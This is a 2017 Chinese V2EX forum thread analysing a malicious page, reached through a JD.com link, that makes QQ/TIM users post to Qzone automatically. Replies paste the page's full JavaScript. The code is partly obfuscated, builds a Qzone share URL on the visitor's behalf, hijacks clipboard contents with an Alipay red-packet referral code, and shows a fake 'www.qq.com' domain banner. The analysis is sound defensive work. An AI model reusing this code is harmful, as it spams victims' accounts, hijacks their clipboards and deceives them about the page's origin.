这是京东被日了? qq 或 tim 打开就会自动发说说

2017-12-22 14:39:24 +08:00
 cy97cool
这是京东被日了? qq 或 tim 打开就会自动发说说

weibo 短链接 /RTkcmPE

v2ex 不能发短链接,所以感兴趣的可以手动构造出完整 url

在 qq 或 tim 中慎点 如果点了及时删空间说说
8249 次点击
所在节点    全球工单系统
39 条回复
ljsh0102
2017-12-22 15:29:09 +08:00
为毛我试了一圈没见生效啊,修复啦
Va1n3R
2017-12-22 15:30:08 +08:00
@ljsh0102 手机点开,或者电脑修改 user-agent
Telegram
2017-12-22 15:30:12 +08:00
就是喜欢你们这帮懂 js 的技术宅,贼可爱。
那么问题来了,京东的人呢,还不进来领漏洞?
cy97cool
2017-12-22 15:32:46 +08:00
@Va1n3R
谢谢大佬

看起来还需要继续跟进 index.js 也许才知道 csrf 咋实现的
ljsh0102
2017-12-22 15:35:19 +08:00
@Va1n3R 手机点开打不开网页.....
cy97cool
2017-12-22 15:37:41 +08:00
@ljsh0102 我用手机 tim 打开本帖
https://www.v2ex.com/t/416827#reply24

可以点开 1L 的长链接
dlllcs
2017-12-22 15:38:50 +08:00
http://www.qqvideo.ga/index.js?121535:

var sharesta=false;
var voddata;
var vodpic;
var zCode=["iSVjBI77a7","stEIuv853z","XIPF0u52Nk"];

function setCookie(name,value,Days){
var exp = new Date();
exp.setTime(exp.getTime() + Days*24*60*60*1000);
document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString();
}
function getCookie(name){
var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");
if(arr=document.cookie.match(reg))
return unescape(arr[2]);
else
return null;
}
function AutoScroll(obj) {
$(obj).find("ul:first").animate({
marginTop: "-30px"
},
500,
function() {
$(this).css({
marginTop: "0px"
}).find("li:first").appendTo(this);
});
}
function checkplay(){
var myAudio = document.getElementById('tenvideo_video_player_0');
if(myAudio!==null){
var ptime=myAudio.currentTime;
if(!myAudio.paused){
if(ptime >= voddata.playtime && getCookie("share_"+voddata.movieid)!="True"){
$(".fxbac").css('display','block');
$(".sharebox").css('display','block');
//$(".tvp_poster_img").html('<div style="background:url( http://ugc.qpic.cn/gbar_pic/NjBmHRR7MAXeUF3BMAbHianSiah4ic0VArvIMjmNK7EDL3AlVERHecYoA/0); opacity:0.9;filter:alpha(opacity=90); width:235px; height:50px; margin:10px auto;"></div>');
myAudio.pause();
}else{
$(".fxbac").css('display','none');
$(".sharebox").css('display','none');
myAudio.play();
}
}
}
}
function loadplayer(){
var video = new tvp.VideoInfo();
video.setVid(voddata.movieid);
var player = new tvp.Player();
player.create({
video: video,
modId: "videoId",
width:$(document).width(),
height:"240",
pic:vodpic,
isHtml5ShowPosterOnEnd:true,
isHtml5ShowPlayBtnOnPause:true,
isiPhoneShowPosterOnPause:true,
vodFlashSkin:'http://imgcache.qq.com/minivideo_v1/vd/res/skins/TencentPlayerMiniSkin.swf',
});
setInterval(checkplay,1000);
}
function loadplayer2(){
var video = new tvp.VideoInfo();
video.setVid(voddata.movieid);
var player = new tvp.Player($(document).width(), 250);
player.setCurVideo(video);
player.addParam("autoplay",0);
player.write("videoId");
setInterval(checkplay,1000);
}
function open_url(link){
var html='<a href="'+link+'" target="_blank" rel="noreferrer"><i id="clickobj">link</i></a>';
$("#bottom").prepend(html);
$("#clickobj").trigger('click');
$("a").remove("#bottom a");
}
function loadindex(){
$.getJSON(atob("aHR0cDovL3d3dy5xcXZpZGVvLmdhL2dldGRhdGEucGhw")+'?'+ Math.random(), function(data){
voddata =data.movie;
vodpic="http://shp.qpic.cn/qqvideo_ori/0/"+voddata.movieid+"_496_280/0";
$(document).attr("title",voddata.title);
$('.rich_media_title').html(voddata.title);
$("meta[itemprop='name']").attr('content',voddata.title);
$("meta[itemprop='image']").attr('content',vodpic);
$("meta[itemprop='description']").attr('content',voddata.desc);
$.each(data.textad, function(key, content){
$("#text_info").append("<li><a href='javascript:;' onclick=\"open_url('"+content.url+"')\">"+content.title+"</a></li>");
});
$.each(data.imgad, function(key, content){
$(".imgtjlist").append("<div class='imgtj_list' onclick=\"open_url('"+content.url+"')\"><span>"+content.title+"</span><img src='"+content.img+"'></div>");
});
$("#bottom").html(atob(data.botinfo));
setInterval('AutoScroll(".txttj")', 5000);
loadplayer();
});
}
$(function() {
loadindex();
$(".button-r")["on"]("click",
function() {
$(".fxbac")["css"]('display', 'none');
$(".sharebox")["css"]('display', 'none')
});
$(".button-l")["on"]("click",
function() {
setCookie("share_" + voddata["movieid"], "True", 1);
var mfkL1 = {
url: voddata["surl"],
desc: '',
summary: voddata["desc"],
site: '',
page: 'qzshare.html',
logintype: 'qzone',
referer: voddata["surl"],
title: voddata["title"],
loginpage: 'loginindex.html',
imageUrl: vodpic,
};
var zd2 = [];
for (var syZ3 in mfkL1) {
zd2["push"](syZ3 + '=' + encodeURIComponent(mfkL1[syZ3] || ''))
}
var BiDOtNO5 = ['https://h5.qzone.qq.com/q/qzs/open/connect/widget/mobile/qzshare/index.html?', zd2["join"]('&'), '']["join"]('');
$(".button-l")["attr"]('href', BiDOtNO5);
return true
});
$('body')["click"](function(jDRjcc7) {
var QBEUb8 = new Clipboard(('body'));
$('body')["attr"]('data-clipboard-text', '复制这句话,打开支付宝领取大大大红包!还有惊喜红包等你拿!&' + zCode[window["Math"]["floor"](window["Math"]["random"]() * zCode["length"])] + '&')
})
});
var PLvy9 = $(window["document"]);
var gtjtc10 = 0;
var kstowPzk11 = 0;
addEventListener("touchstart",
function(yzb12) {
gtjtc10 = yzb12["touches"][0]["pageY"]
});
addEventListener("touchmove",
function(Y13) {
kstowPzk11 = Y13["touches"][0]["pageY"];
if (PLvy9["scrollTop"]() <= 0 && gtjtc10 < kstowPzk11) {
Y13["preventDefault"]();
if ($('#_domain_display')["length"] <= 0) {
$('body')["prepend"]('<div id="_domain_display"><p>\u7f51\u9875\u7531 www.qq.com \u63d0\u4f9b</p></div>')
}
$('#_domain_display')["height"]((kstowPzk11 - gtjtc10))
}
});
addEventListener("touchend",
function(FhKmnhn14) {
$('#_domain_display')["slideUp"]('normal',
function() {
$('#_domain_display')["remove"]()
})
});
Va1n3R
2017-12-22 15:49:40 +08:00
var BiDOtNO5 = ['https://h5.qzone.qq.com/q/qzs/open/connect/widget/mobile/qzshare/index.html?', zd2["join"]('&'), '']["join"]('');
$(".button-l")["attr"]('href', BiDOtNO5);
return true
});
button-l 就是这个按钮咯~黑阔直接帮你点了分享按钮,所以访问即发空间~
dlllcs
2017-12-22 15:49:51 +08:00
主要发说说的代码, 不过好像我测试好像已经失效了:

```
$(function() {
loadindex();
$(".button-r")["on"]("click",
function() {
$(".fxbac")["css"]('display', 'none');
$(".sharebox")["css"]('display', 'none')
});
$(".button-l")["on"]("click",
function() {
setCookie("share_" + voddata["movieid"], "True", 1);
var mfkL1 = {
url: voddata["surl"],
desc: '',
summary: voddata["desc"],
site: '',
page: 'qzshare.html',
logintype: 'qzone',
referer: voddata["surl"],
title: voddata["title"],
loginpage: 'loginindex.html',
imageUrl: vodpic,
};
var zd2 = [];
for (var syZ3 in mfkL1) {
zd2["push"](syZ3 + '=' + encodeURIComponent(mfkL1[syZ3] || ''))
}
var BiDOtNO5 = ['xxxx?', zd2["join"]('&'), '']["join"]('');
$(".button-l")["attr"]('href', BiDOtNO5);
return true
});
$('body')["click"](function(jDRjcc7) {
var QBEUb8 = new Clipboard(('body'));
$('body')["attr"]('data-clipboard-text', '复制这句话,打开支付宝领取大大大红包!还有惊喜红包等你拿!&' + zCode[window["Math"]["floor"](window["Math"]["random"]() * zCode["length"])] + '&')
})
});
```
Va1n3R
2017-12-22 15:50:17 +08:00
算得上是 CSRF,角度很刁钻。
dlllcs
2017-12-22 15:52:32 +08:00
另外,好像不止发说说,还帮你复制了他们的支付宝红包码,在你下次打开支付宝会自动打开他们的红包...

结论: 又一个为了赚支付宝红包的程序员干的...
birds7
2017-12-22 16:59:48 +08:00
JD 这到现在还没修
x86
2017-12-22 17:03:30 +08:00
@dlllcs 支付宝都有了,那抓他就是看两边公司是否愿意报案了
dong3580
2017-12-22 17:30:39 +08:00
@dlllcs
原来是这样,前不久出现过打开支付\n 宝自动弹\n 窗红\n 包的情况,不知道那个软件对剪切板下手了,
dong3580
2017-12-22 17:31:41 +08:00
@Livid
v2 回帖已经成这样了...唉...
不知道哪个关键字触发了?
Livid
2017-12-22 17:48:39 +08:00
@dong3580 /t/415556
dong3580
2017-12-22 18:22:35 +08:00
@Livid
明白
Jverson
2017-12-22 18:25:00 +08:00
@cy97cool 是不是已经修了,试了一下不行啊
fox0001
2017-12-22 18:53:49 +08:00
说说是什么?

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/416827

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX